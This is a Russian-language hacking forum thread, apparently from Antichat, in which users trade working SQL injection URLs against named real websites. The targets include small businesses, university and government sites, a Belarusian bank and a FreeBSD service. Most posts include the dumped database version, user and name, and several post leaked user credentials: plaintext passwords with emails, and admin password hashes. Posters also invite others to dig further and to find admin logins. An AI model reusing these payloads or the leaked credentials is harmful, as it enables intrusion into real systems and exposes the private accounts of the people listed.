SQL Инъекции

Code:

http://[COLOR=YellowGreen][host][/COLOR]/searchresult.php?sbcat_id=999999[sql-inj]

Code:

http://[COLOR=YellowGreen]www.mytarif.com[/COLOR]/searchresult.php?sbcat_id=11111111+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

4.1.22-standard:anime_yemek@localhost:anime_yemek

Code:

http://[COLOR=YellowGreen]www.garnek.net[/COLOR]/searchresult.php?sbcat_id=11111111+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

4.1.22-log:[email protected]:byq_9

Code:

http://[COLOR=YellowGreen]www.kochfeuer.de[/COLOR]/searchresult.php?sbcat_id=9999999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

5.0.32-Debian_7etch1~bpo.1-log:dbu1017245@localhost:db1017245-kochfeuer1

Code:

http://[COLOR=YellowGreen]www.coolave.com[/COLOR]/resources/searchresult.php?sbcat_id=99999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4/*

5.0.37-standard-log:avemusic_h742510@localhost:avemusic_coolave

Code:

http://[COLOR=YellowGreen]www.arabhorse.com[/COLOR]/links/searchresult.php?sbcat_id=1111+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4/*

4.1.22-standard:arabhors_ah@localhost:arabhors_arabhorsedb

Code:

http://[COLOR=YellowGreen]www.desikitchen.com[/COLOR]/new/searchresult.php?sbcat_id=11111111+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

4.1.22-standard:desikit_desikit2@localhost:desikit_portal2

Code:

http://[COLOR=YellowGreen]www.bobsbeerandbbq.com[/COLOR]/searchresult.php?sbcat_id=11111111+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

5.0.27-standard-log:claudia_recipe@localhost:claudia_recipe

Code:

http://[COLOR=YellowGreen]www.dubina.com[/COLOR]/searchresult.php?pg=5&sbcat_id=9999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5/*

4.1.22-standard-log:dubinaco_dubdir@localhost:dubinaco_dir1

Code:

http://[COLOR=YellowGreen]www.grizzlynut.co.nz[/COLOR]/directory/searchresult.php?&sbcat_id=99999999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4/*

4.1.22-standard-log:grizzlyn_direct@localhost:grizzlyn_direct

 

Code:

http://www.realityhomes.com.do/cat.php?id=999+union+select+1,2,3,concat_ws(0x2F,user,pass,mail),5,6,7,8,9,10,11+from+usuarios/*

Version: 5.0.27-standard/nachon_sistema@localhost/nachon_sistema

Админы и юзвери

User Pass Mail

nachon/viejito/[email protected]
guitarman/123456/[email protected]
yospower/power/[email protected]
tribi32/triby0/[email protected]
F./5v5ml5g5v5/[email protected]
teodoro/toly2468/[email protected]
joriel/0230/[email protected]
nmcprl/Carlanatalia/[email protected]
herrerap/222008/[email protected]
Carlos/crpf13/[email protected]
mamto/8808607/[email protected]
Jissel/filipe/[email protected]
otto/77688166601/[email protected]
dj-luis/987654321/[email protected]
elisa/espimai/[email protected]

 

Группа Центр

Дата рождения: 2004 год
Место рождения: г. Москва

Краткое досье: это одно из самых сильных звеньев СПРУТ групп, который является Единственным Союзом по-настоящему разносторонних уличных талантов. «Центр» является основой этого объединения, принимая непосредственное участие в концертной и творческой деятельности проекта.
Группа «Центр» объединяет самых перспективных и интересных рэп-исполнителей на данный момент: Гуфа aka Rolex-X, Slim’а aka Slimus, Птаху и Принципа. И если первый – гений текстов и крылатых фраз, второй профессионал от музыки, то последние два – отлично читают, преподнося наработанный материал наилучшим образом.

PHP:

http://www.centrgroup.ru/nn.php?id=-1+union+select+1,2,3,4,5,concat(id,0x20,user_name,0x3a,user_pass),7+from+users+where+id=1/*

и ещё чета

PHP:

http://www.gala-europe.de/ps.php?ID=-1'+union+select+table_name,2+from+information_schema.tables/*

 

rmx.ru

http://www.rmx.ru/photo/?id=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on
Windows NT 5.2 (Build 3790: Service Pack 1)

http://www.rmx.ru/photo/?id=-1+or+1=(select+db_name())-- remix

http://www.rmx.ru/photo/?id=-1+or+1=(select+system_user)-- REMIXUS\IUSR_REMIXUS

------------------------------------------------------------------------

e-rostov.ru

http://www.e-rostov.ru/nws_podrob.php?nws=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9/*

5.0.27/db0662111/db0662111@localhost



http://www.e-rostov.ru/nws_podrob.php?nws=-1+union+select+1,2,3,4,5,concat_ws(0x2F,cast(al_login+as+binary),cast(al_password+as+binary)),7,8,9+from+admin_list+limit+0,1/*

логин/хеш
artexoid/81dc9bdb52d04dc20036dbd8313ed055


Другие интересные таблицы:

board_admin (LOGIN/ PASSWD), estate_admin(LOGIN/ PASSWD), estate_loginag(LOGIN / PASSWORD), news_admin(LOGIN/ PASSWD), question_admin(LOGIN/ PASSWD), stat_admin(LOGIN/ PASSWD), stic_admin(LOGIN/ PASSWD)

 

http://utdallas.edu/calendar/event.php?id=-1+UNION+SELECT+1,database(),version(),user(),5,6,7,8,9,10,11,12,13/*

user() == [email protected]
database() == calendar
version() == 4.0.18-max-log

 

И вновь - Румыния!

burseguvern.ro

Code:

http://www.burseguvern.ro/articole/articol.php?id=2&id_modul=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5/*

4.1.22-standard-log:burseguv_burse:burseguv_adm@localhost

ugir1903.ro

Code:

http://www.ugir1903.ro/ugir1903/articol.php?codp=-1+union+select+concat_ws(0x3a,version(),database(),user())/*

4.1.22-standard-log:ugir1903_main:ugir1903_web@localhost

dreptonline.ro

Code:

http://www.dreptonline.ro/articole/articol.php?id_articol=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9/*

4.1.22-standard:dreptonl_dr:dreptonl_dr@localhost

В табе useri 12 692 юзера :

Code:

http://www.dreptonline.ro/articole/articol.php?id_articol=-1+union+select+concat_ws(0x3a,user,parola,email),2,3,4,5,6,7,8,9+from+useri+limit+12691,1/*

Немного данных [user : pass : email] :

Code:

Dan:gringotts:[email protected]
[COLOR=MediumTurquoise]Hfirimain:gringotts:[email protected][/COLOR] - типа Админ
auras1:ferari11:[email protected]
florian.r:dreptcivil:[email protected]  

 

Румыния

SmartCall.ro

Code:

http://www.smartcall.ro/document.php?doc=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4,5,6,7,8,9/*

5.0.18:smartcall:smartcall@localhost

Наша таба auth_users:

Code:

id,username,email,password_md5,конецформыначалоформыis_superuser,first_name,last_name

Данные:

Code:

http://www.smartcall.ro/document.php?doc=-1+union+select+1,2,concat_ws(0x3a,aes_decrypt(aes_encrypt(username,0x71),0x71),aes_decrypt(aes_encrypt(password_md5,0x71),0x71)),4,5,6,7,8,9+from+test.auth_users+limit+0,1/*

Админ:

Code:

dima:ebb934cccce0cbe48e5b017398807a46

AMIcom.ro

Code:

http://www.amicom.ro/studii/studiu.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*

5.0.27:amicom:amicomadmin@localhost

Таба users:

Code:

username,userpass

Админка стандартно - _http://www.amicom.ro/admin/

Админ:

Code:

admin : admin123

 

Румыния

ReporterDeOcazie.ro

Code:

http://www.reporterdeocazie.ro/index.php?page=intrebarea_zilei&id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*

5.0.21:reporterdeocazie:reporter@localhost

Наши таблицы - Admin,Useri и phpbb_users

Таблица Admin - пустая, с остальными проблем нет:

Code:

http://www.reporterdeocazie.ro/index.php?page=intrebarea_zilei&id=-1+union+select+1,concat_ws(0x3a,User,Password,Email),3,4,5+from+Useri+limit+0,1/*

 

Муниципальные образования Приморского края

Code:

http://www.mo.primorsky.ru/kirovsky/view.php?id=-1+union+select+1/*

www.mxd.ru

Code:

http://www.mxd.ru/projects/design/view.php?id=-1+union+select+1,database(),3,4,user(),6,7,pass,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23+from+user/*

Пароль админа: root
правда логин не знаю , и куда все эт сувать
[email protected]
4.0.27-log
http://women.unesco.kz

Code:

http://women.unesco.kz/view.php?id=-1+union+select+concat(login,0x3a,pwd),2,3,4,5,6+from+users+limit+1/*

XaHyMaH : aurora
не нашел где залогиниться =(
http://www.patkirk.com

Code:

http://www.patkirk.com/make.php?id=-1+union+select+user(),database(),version(),4,5,6,7+INFORMATION_SCHEMA/*

web18-patkirk1@localhost
web18-patkirk1
5.0.45-community
дальше ни че не смог сделать. есил что то получится у вас, отпишитесь плз.

Code:

http://www.age.fr/fr/module.php?ID=-1+order+by+11/*

После долгих мучений, я в плюсе!!!

 

http://portsmon.freebsd.org/

http://portsmon.freebsd.org/portoverview.py?category=&portname=gkrellsun'+UniOn+selEct+concat(version(),':',user()),2,3,4/*&wildcard=yes
5.0.45_:_portsmon_u@localhost

http://portsmon.freebsd.org/portoverview.py?category=&portname=gkrellsun'+UniOn+selEct+concat(table_name,':',column_name),2,3,4+from+information_schema.columns/*&wildcard=yes

таблиц много, но как и следовало ожидать /для меня/ не чего интересного

 

Италия

Code:

http://www.megalab.it/articoli.php?id=220&pagina=-2+union+select+concat_ws(char(58),user(),version(),database())/*

megalabdb@localhost:5.0.37-log:megalab

Code:

http://www.aduc.it/dyn/comunicati/comu_mostra.php?id=999999999999999+union+select+1,2,concat_ws(char(58),user(),version(),database()),4/*

aduc@localhost:5.0.26:aducdb

Code:

http://www.sodalitas.it/news.php?ID=-222+union+select+1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46/*

sod78as68@localhost:4.1.20:Sql945as

Code:

http://www.corvorosso.it/pagine/articoli.php?id=-1021+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

[email protected]:5.0.24a-Debian_9ubuntu2-log:corvo

Code:

http://www.ghislieri.it/pagina.php?id=-104+union+select+1,2,3,4,5,6,7,8/*

rettorato@localhost:5.0.27-log:rettorato

 

http://www.onboard.ru

Code:

http://www.onboard.ru/resort/?id=-1+union+select+user()/*

 

Италия

Code:

http://www.millenniumcampaign.it/standup/newsDett.php?id=-36+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5/*

[email protected]:4.1.22-standard-log:millenniumcampaign_it_standup2007



edu

Code:

http://blogsforlearning.msu.[SIZE=4][B][COLOR=Red]edu[/COLOR][/B][/SIZE]/articles/view.php?id=-6+union+select+1,2,3,4,5,6,7,8,9/*

 

ОАО «Белвнешэкономбанк»

Code:

http://www.bveb.by/news/index.php?ItemNumber=-1+union+select+1,2,3,4,5,6,7,8,9,1,2/*

Кому интересно, копайте дальше...

 

нифига не получается! пробую просто на локальном компе, вообще для другой базы. На простейшем примере.
Вот так пишет в файл:

Code:

SELECT description
FROM films
WHERE fid =5 into outfile '123654.txt'

а вот так выдает ошипку:

Code:

SELECT description
FROM films
WHERE fid =5 into outfile char(49,50,51,54,53,52,46,116,120,116)

и так тоже не пашет: (типа имя файла в кавычки взял:

Code:

SELECT description
FROM films
WHERE fid =5 into outfile char(39,49,50,51,54,53,52,46,116,120,116,39)

Выходит, что нельзя писать в файл если кавычечги фильтруются?

 

код:

http://inbox.net.ua/index.php?id=900&show=news&newsid=-3462+union+select+1,table_name,3+from+information_schema.tables+limit+992,1/*

большая бд,стоит фильтрация на скобки
__________________________________________
достаточно большой сайт

код:
http://www.femina.com.ua/cgi-bin/board.cgi?page=694&zrazdel=-3+union+select+1,concat(username,0x3a,user_password)+from+phpbb_users+limit+1,1/*&pages=1046

5 версия мускула,много таблиц

админ на форуме admin:atvbyf

__________________________________________

тоже не маленький сайт

код:

http://wantbaby.info/guide/glossary/?Term=-5+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9+from+information_schema.columns/*

вывод-"все сразу"

 

www.strawtec.com.au

Code:

http://www.strawtec.com.au/content.php?id=<sql-inj>

4.1.12a-nt-max:strawtec@localhost:strawbale

Code:

strawtecadmin:snowfall88
strawtec:Phil Egan
brett:trustno1

 

Официальный сайт хоккейного клуба «Рязань»

Code:

http://hcryazan.ru/about_user.php?id=-1+union+select+1,concat_ws(0x3a,name,pass,mail,icq),3,mail,icq,pass,6,7,8,9+from+users/*

Эт база всех юзеров - ник пароль мыло ася
Admin : secret : [email protected] : 399828412
помогите найти, куда пароль вводить для админа.
З.Ы: если кто за них болеет, не обижайтесь

Code:

http://www.shadowknights.ru/index.php?id=-1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13/*

 

Дефэйсы запрещаются АНТИЧАТОМ!

 

zamut
понятно, никаких дефейсов!
за что ж вы так с моей репой?